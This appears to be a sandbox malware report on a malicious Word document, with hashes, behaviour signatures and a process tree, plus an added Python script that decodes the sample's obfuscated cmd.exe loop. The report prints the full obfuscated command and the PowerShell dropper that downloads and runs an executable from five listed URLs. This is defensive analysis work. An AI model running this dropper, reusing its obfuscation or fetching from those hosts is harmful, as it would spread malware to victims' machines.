Analysis

  • max time kernel
    107s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    16-05-2022 20:57

General

  • Target

    0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318.doc

  • Size

    124KB

  • MD5

    b6e13c6a1d437ed02509be01dd334983

  • SHA1

    a12ee91c820278590d58f0f846067992c1aa1053

  • SHA256

    0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318

  • SHA512

    8bfc1ffaaa45a8d7f6add5c51e7d1e8e62c95b71b7f76905e3a497f9957227991cd7eef477bc073483d375a3dadaef46d2d7e7376ed170a636fcd194b5836cba

Score
10/10

Malware Config

Extracted

  • Language
    ps1 (deobfuscated)
  • URLs (exe.dropper)
    http://www.novasystemsindustria.eu/cJcton
    http://velvet.com.br/2T6r4fYa
    http://www.batikentemlak.org/dEXSJO5y
    http://tongkhosoncongnghiep.com/DiJuOX
    http://www.fibraoptica.ro/8fG

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Windows\SYSTEM32\CMd.exe
      CMd \/ // //// / \ / /V:O/C"set ]}*~=027a 072a 07a2 0a72 207a 2a70 0a72 270a 72a0 7a02 a027 a207 02a7 a702 720a 7a02 72a0 7a02}207a}a072{027aha270ca720t720aaa702c20a7}720a;027ak2a07aa702e072ar7a02b270a;a720J20a7i0a72W27a0$207a 20a7ma270e2a07ta027I70a2-07a2e270ak072ao20a7va702n20a7I072a;07a2)20a7J2a70ia720W702a$7a02 27a0,20a7Ta027D02a7v70a2$a072(20a7e027al72a0ia270F072ad70a2a7a02oa702l2a70n27a0w702aoa702Da207.a207C0a27T207ar27a0$a027{7a20y270ar2a70t0a27{2a07)a270N2a70K20a7ra072$a072 70a2n27a0i0a72 720aT0a72Da207v720a$a702(a702h207ac027aa27a0e0a27ra027o7a20f27a0;2a70'702ae0a27x27a0ea270.a270'7a02+0a27i0a27z072aia207$2a07+02a7'20a7\072a'702a+72a0ca072i072al720ab027au2a07p02a7:27a0va702n702ae70a2$2a07=7a02J027ai0a27Wa702$2a07;2a70'70a262a7052a071a270'207a 07a2=a270 02a7ia027za270ia207$027a;a270)2a70'a027@0a27'7a20(20a7t2a07ia072l072ap2a07S072a.7a02'7a02G072af270a82a70/a270o70a2r0a72.702aa07a2c20a7i20a7t07a2pa702o72a0a720ar2a07b20a7i2a70f7a20.2a70wa027w20a7w20a7/02a7/02a7:0a72pa720ta720ta270h720a@072aX072aOa027ua702J72a0i2a70D27a0/0a72ma072o207aca270.072apa207e7a20i20a7h027ag027an7a02g027an027ao7a20c70a2n0a27o0a27sa027o2a70ha270k072ag027an2a70o702ata072/027a/02a7:0a27pa207t702at27a0h7a02@20a7y027a507a2O72a0Ja720S702aX20a7E7a02da207/72a0ga072r072aoa702.70a2k2a07a72a0l072am072ae270ata702n720ae72a0k072aia072t27a0a20a7b702a.2a70w7a20w07a2w02a7/720a/7a02:07a2p07a2t07a2t720ah20a7@720aaa270Y072af27a0470a2ra0276a270T7a02227a0/2a07r2a70b270a.a270ma072oa207c027a.027at07a2ea027v7a20l20a7e7a20v72a0/027a/720a:0a72p072at0a72ta072ha720@072ana072o207ata072ca720Ja027c2a70/207au7a20e072a.a027a02a7i20a7r702at27a0s0a72u72a0d7a02na270i7a20s702am027aea072t270as0a72ya270sa027a7a20va027oa207n72a0.702aw0a27w027awa270/20a7/720a:72a0pa720t207at2a07h7a20'70a2=2a07N0a27K027ar0a72$7a02;a720ta207n0a72e2a07i70a2l0a27C720aba270e072aW207a.2a07t02a7e27a0N0a27 207at072ac027ae7a20j72a0ba720oa072-a207wa702e207an0a72=702aC20a7T0a72r072a$270a a207l207al2a07e02a7ha702s7a02r20a7ea270wa270oa720p&&for /L %g in (1944,-5,4)do set .#=!.#!!]}*~:~%g,1!&&if %g leq 4 call %.#:~-389%"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $rTC=new-object Net.WebClient;$rKN='http://www.novasystemsindustria.eu/cJcton@http://velvet.com.br/2T6r4fYa@http://www.batikentemlak.org/dEXSJO5y@http://tongkhosoncongnghiep.com/DiJuOX@http://www.fibraoptica.ro/8fG'.Split('@');$izi = '156';$WiJ=$env:public+'\'+$izi+'.exe';foreach($vDT in $rKN){try{$rTC.DownloadFile($vDT, $WiJ);Invoke-Item $WiJ;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2392
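How the CMd.exe stage above turns into the PowerShell stage, as an added worked example (the command lines are copied from this report; the parser, the emulator and every function and constant name are the editor's, not code from the sample or from the sandbox). The cmd line stores a 1945-character buffer in the variable `]}*~`; only every fifth character (indices 4, 9, ..., 1944) is real, and those are the payload written back to front. With `/V:O` enabling delayed `!var!` expansion, `for /L %g in (1944,-5,4)` appends `!]}*~:~%g,1!` (the one character at index %g) to `.#` on each pass, and on the final pass (`%g leq 4`) `call %.#:~-389%` performs a second round of `%...%` expansion on the now complete 389-character accumulator and executes it. The example replays that loop in Python and checks the result against the PowerShell the sandbox extracted; the 17 characters of difference are trailing spaces that come from the padding at indices 4 to 84 of the buffer.

```python
"""Replay the cmd.exe substring-reassembly loop from the report's process tree.

The scrambled command line and the PowerShell it expands to are copied from the
report; the parser, the emulator and every name in this file are part of an
added example, not code from the sample or from the sandbox.
"""
import re

# Verbatim from the CMd.exe entry in the report (the two extracted lines were
# re-joined at the "%g in" break).
OBFUSCATED_CMD = r'''CMd \/ // //// / \ / /V:O/C"set ]}*~=027a 072a 07a2 0a72 207a 2a70 0a72 270a 72a0 7a02 a027 a207 02a7 a702 720a 7a02 72a0 7a02}207a}a072{027aha270ca720t720aaa702c20a7}720a;027ak2a07aa702e072ar7a02b270a;a720J20a7i0a72W27a0$207a 20a7ma270e2a07ta027I70a2-07a2e270ak072ao20a7va702n20a7I072a;07a2)20a7J2a70ia720W702a$7a02 27a0,20a7Ta027D02a7v70a2$a072(20a7e027al72a0ia270F072ad70a2a7a02oa702l2a70n27a0w702aoa702Da207.a207C0a27T207ar27a0$a027{7a20y270ar2a70t0a27{2a07)a270N2a70K20a7ra072$a072 70a2n27a0i0a72 720aT0a72Da207v720a$a702(a702h207ac027aa27a0e0a27ra027o7a20f27a0;2a70'702ae0a27x27a0ea270.a270'7a02+0a27i0a27z072aia207$2a07+02a7'20a7\072a'702a+72a0ca072i072al720ab027au2a07p02a7:27a0va702n702ae70a2$2a07=7a02J027ai0a27Wa702$2a07;2a70'70a262a7052a071a270'207a 07a2=a270 02a7ia027za270ia207$027a;a270)2a70'a027@0a27'7a20(20a7t2a07ia072l072ap2a07S072a.7a02'7a02G072af270a82a70/a270o70a2r0a72.702aa07a2c20a7i20a7t07a2pa702o72a0a720ar2a07b20a7i2a70f7a20.2a70wa027w20a7w20a7/02a7/02a7:0a72pa720ta720ta270h720a@072aX072aOa027ua702J72a0i2a70D27a0/0a72ma072o207aca270.072apa207e7a20i20a7h027ag027an7a02g027an027ao7a20c70a2n0a27o0a27sa027o2a70ha270k072ag027an2a70o702ata072/027a/02a7:0a27pa207t702at27a0h7a02@20a7y027a507a2O72a0Ja720S702aX20a7E7a02da207/72a0ga072r072aoa702.70a2k2a07a72a0l072am072ae270ata702n720ae72a0k072aia072t27a0a20a7b702a.2a70w7a20w07a2w02a7/720a/7a02:07a2p07a2t07a2t720ah20a7@720aaa270Y072af27a0470a2ra0276a270T7a02227a0/2a07r2a70b270a.a270ma072oa207c027a.027at07a2ea027v7a20l20a7e7a20v72a0/027a/720a:0a72p072at0a72ta072ha720@072ana072o207ata072ca720Ja027c2a70/207au7a20e072a.a027a02a7i20a7r702at27a0s0a72u72a0d7a02na270i7a20s702am027aea072t270as0a72ya270sa027a7a20va027oa207n72a0.702aw0a27w027awa270/20a7/720a:72a0pa720t207at2a07h7a20'70a2=2a07N0a27K027ar0a72$7a02;a720ta207n0a72e2a07i70a2l0a27C720aba270e072aW207a.2a07t02a7e27a0N0a27 207at072ac027ae7a20j72a0ba720oa072-a207wa702e207an0a72=702aC20a7T0a72r072a$270a a207l207al2a07e02a7ha702s7a02r20a7ea270wa270oa720p&&for /L %g in (1944,-5,4)do set .#=!.#!!]}*~:~%g,1!&&if %g leq 4 call %.#:~-389%"'''

# The sandbox's own deobfuscation of the same command, used here as the oracle.
REPORTED_POWERSHELL = r"powershell $rTC=new-object Net.WebClient;$rKN='http://www.novasystemsindustria.eu/cJcton@http://velvet.com.br/2T6r4fYa@http://www.batikentemlak.org/dEXSJO5y@http://tongkhosoncongnghiep.com/DiJuOX@http://www.fibraoptica.ro/8fG'.Split('@');$izi = '156';$WiJ=$env:public+'\'+$izi+'.exe';foreach($vDT in $rKN){try{$rTC.DownloadFile($vDT, $WiJ);Invoke-Item $WiJ;break;}catch{}}"

# Shape being matched (editor's regex, tuned to this family of one-liners):
#   set NAME=BUFFER&&for /L %v in (start,step,stop)do set ACC=!ACC!!NAME:~%v,1!
#   &&if %v <op> N call %ACC:~TAIL%
LOOP_RE = re.compile(
    r'set (?P<name>[^=]+)=(?P<value>.*?)'
    r'&&for /L %(?P<var>\w)\s+in \((?P<start>-?\d+),(?P<step>-?\d+),(?P<stop>-?\d+)\)\s*'
    r'do set (?P<acc>[^=]+)=!(?P=acc)!!(?P=name):~%(?P=var),1!'
    r'&&if %(?P=var) \w+ -?\d+ call %(?P=acc):~(?P<tail>-?\d+)%',
    re.S,
)


def parse_loop(cmdline: str) -> dict:
    """Pull the scrambled buffer and the loop parameters out of the command line."""
    m = LOOP_RE.search(cmdline)
    if m is None:
        raise ValueError("command line does not match the set / for /L / call pattern")
    return {
        "value": m["value"],
        "start": int(m["start"]),
        "step": int(m["step"]),
        "stop": int(m["stop"]),
        "tail": int(m["tail"]),
    }


def emulate(value: str, start: int, step: int, stop: int, tail: int) -> str:
    """Emulate `for /L` appending !VALUE:~i,1! for each i, then `%ACC:~tail%`.

    cmd's for /L includes the stop value; %var:~i,1% is "" for an index past
    either end; %var:~-N% is the last N characters and %var:~N% everything
    from N. Python slicing uses the same sign convention, so the final
    `call %ACC:~tail%` step is a single slice.
    """
    if step == 0:
        raise ValueError("for /L with step 0 never terminates")
    last = stop + (1 if step > 0 else -1)
    acc = []
    for i in range(start, last, step):
        if -len(value) <= i < len(value):
            acc.append(value[i])
    return "".join(acc)[tail:]


def deobfuscate(cmdline: str) -> str:
    """Return the text that `call` eventually executes (trailing padding kept)."""
    p = parse_loop(cmdline)
    return emulate(p["value"], p["start"], p["step"], p["stop"], p["tail"])


def extract_urls(powershell: str) -> list:
    """Pull the @-separated download URLs out of the expanded PowerShell."""
    return re.findall(r"https?://[^'@\s\"]+", powershell)


def main():
    ps = deobfuscate(OBFUSCATED_CMD)
    print(f"{len(ps)} chars reassembled; matches report: {ps.rstrip() == REPORTED_POWERSHELL}")
    for url in extract_urls(ps):
        print("exe.dropper", url)


if __name__ == "__main__":
    main()
```

The expanded PowerShell explains why five hosts appear under one `exe.dropper` config: the loop tries each URL in order, writes the first successful download to `$env:public\156.exe`, launches it with `Invoke-Item` and breaks, while the empty `catch{}` swallows every failed host, so a single live server is enough for the infection to proceed. For hunting, the parent-child pair WINWORD.EXE spawning cmd.exe with `/V:O`, a `for /L` loop and a `call %...:~` substring expansion is the stable part of this stage; the variable names, the padding alphabet and the stride all change from sample to sample, which is why the emulator parses them out rather than hard-coding them.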

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/2392-140-0x00007FFB47B80000-0x00007FFB48641000-memory.dmp

    Filesize

    10.8MB

  • memory/2392-139-0x000001E5A6E30000-0x000001E5A6E52000-memory.dmp

    Filesize

    136KB

  • memory/3068-133-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

  • memory/3068-135-0x00007FFB31F80000-0x00007FFB31F90000-memory.dmp

    Filesize

    64KB

  • memory/3068-136-0x00007FFB31F80000-0x00007FFB31F90000-memory.dmp

    Filesize

    64KB

  • memory/3068-134-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

  • memory/3068-130-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

  • memory/3068-132-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

  • memory/3068-131-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

  • memory/3068-142-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

  • memory/3068-143-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

  • memory/3068-144-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

  • memory/3068-145-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB